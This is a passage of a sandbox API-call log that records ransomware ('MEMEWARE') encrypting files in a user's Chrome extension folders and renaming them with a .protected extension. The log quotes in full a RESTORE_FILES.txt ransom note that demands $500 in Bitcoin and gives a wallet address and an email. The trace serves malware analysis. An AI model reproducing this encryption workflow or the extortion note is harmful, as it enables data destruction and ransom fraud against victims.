lpString2="System Volume Information") returned -1 [0079.269] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es_419\\messages.json") returned 160 [0079.269] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.269] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.269] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.269] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.269] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es_419\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es_419\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.270] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es_419\\messages.json") returned 160 [0079.270] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.270] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es_419\\messages.json") returned 160 [0079.270] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.270] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es_419\\messages.json") returned 160 [0079.270] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.270] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x103, lpOverlapped=0x0) returned 1 [0079.271] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffefd, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.271] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x103, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x103, lpOverlapped=0x0) returned 1 [0079.272] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.272] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.272] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.272] CloseHandle (hObject=0x168) returned 1 [0079.272] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es_419\\messages.json.protected") returned 170 [0079.272] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es_419\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es_419\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es_419\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es_419\\messages.json.protected")) returned 1 [0079.273] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.273] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0079.273] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es_419\\RESTORE_FILES.txt") returned 164 [0079.273] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es_419\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es_419\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0079.273] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.273] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.274] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0079.274] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0079.274] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.274] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0079.274] CloseHandle (hObject=0x164) returned 1 [0079.274] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.274] lstrcmpiW (lpString1="et", lpString2="Windows") returned -1 [0079.274] lstrcmpiW (lpString1="et", lpString2="Program Files") returned -1 [0079.274] lstrcmpiW (lpString1="et", lpString2="Program Files (x86)") returned -1 [0079.274] lstrcmpiW (lpString1="et", lpString2="$Recycle.bin") returned 1 [0079.274] lstrcmpiW (lpString1="et", lpString2="System Volume Information") returned -1 [0079.275] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\et") returned 142 [0079.275] lstrcmpW (lpString1="et", lpString2=".") returned 1 [0079.275] lstrcmpW (lpString1="et", lpString2="..") returned 1 [0079.275] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\et\\*") returned 144 [0079.275] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\et\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0079.275] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.275] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.275] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.275] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.275] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.275] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\et\\.") returned 144 [0079.275] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.275] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.275] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.275] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.275] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.275] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.275] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.275] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\et\\..") returned 145 [0079.275] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.275] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.275] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.275] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0079.275] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.275] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0079.275] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.276] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.276] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\et\\messages.json") returned 156 [0079.276] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.276] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.276] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.276] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.276] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\et\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\et\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.276] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\et\\messages.json") returned 156 [0079.276] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.276] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\et\\messages.json") returned 156 [0079.276] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.276] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\et\\messages.json") returned 156 [0079.276] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.276] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xfb, lpOverlapped=0x0) returned 1 [0079.277] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff05, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.277] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xfb, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xfb, lpOverlapped=0x0) returned 1 [0079.277] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.278] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.278] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.278] CloseHandle (hObject=0x168) returned 1 [0079.278] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\et\\messages.json.protected") returned 166 [0079.278] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\et\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\et\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\et\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\et\\messages.json.protected")) returned 1 [0079.278] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.279] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0079.279] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\et\\RESTORE_FILES.txt") returned 160 [0079.279] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\et\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\et\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0079.279] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.279] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.280] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0079.280] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0079.280] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.280] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0079.280] CloseHandle (hObject=0x164) returned 1 [0079.280] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.280] lstrcmpiW (lpString1="eu", lpString2="Windows") returned -1 [0079.280] lstrcmpiW (lpString1="eu", lpString2="Program Files") returned -1 [0079.280] lstrcmpiW (lpString1="eu", lpString2="Program Files (x86)") returned -1 [0079.280] lstrcmpiW (lpString1="eu", lpString2="$Recycle.bin") returned 1 [0079.280] lstrcmpiW (lpString1="eu", lpString2="System Volume Information") returned -1 [0079.280] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\eu") returned 142 [0079.280] lstrcmpW (lpString1="eu", lpString2=".") returned 1 [0079.280] lstrcmpW (lpString1="eu", lpString2="..") returned 1 [0079.280] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\eu\\*") returned 144 [0079.280] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\eu\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0079.281] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.281] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.281] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.281] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.281] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.281] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\eu\\.") returned 144 [0079.281] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.281] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.281] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.281] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.281] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.281] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.281] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.281] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\eu\\..") returned 145 [0079.281] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.281] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.281] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.281] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0079.281] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.282] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0079.282] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.282] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.282] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\eu\\messages.json") returned 156 [0079.282] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.282] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.282] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.282] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, 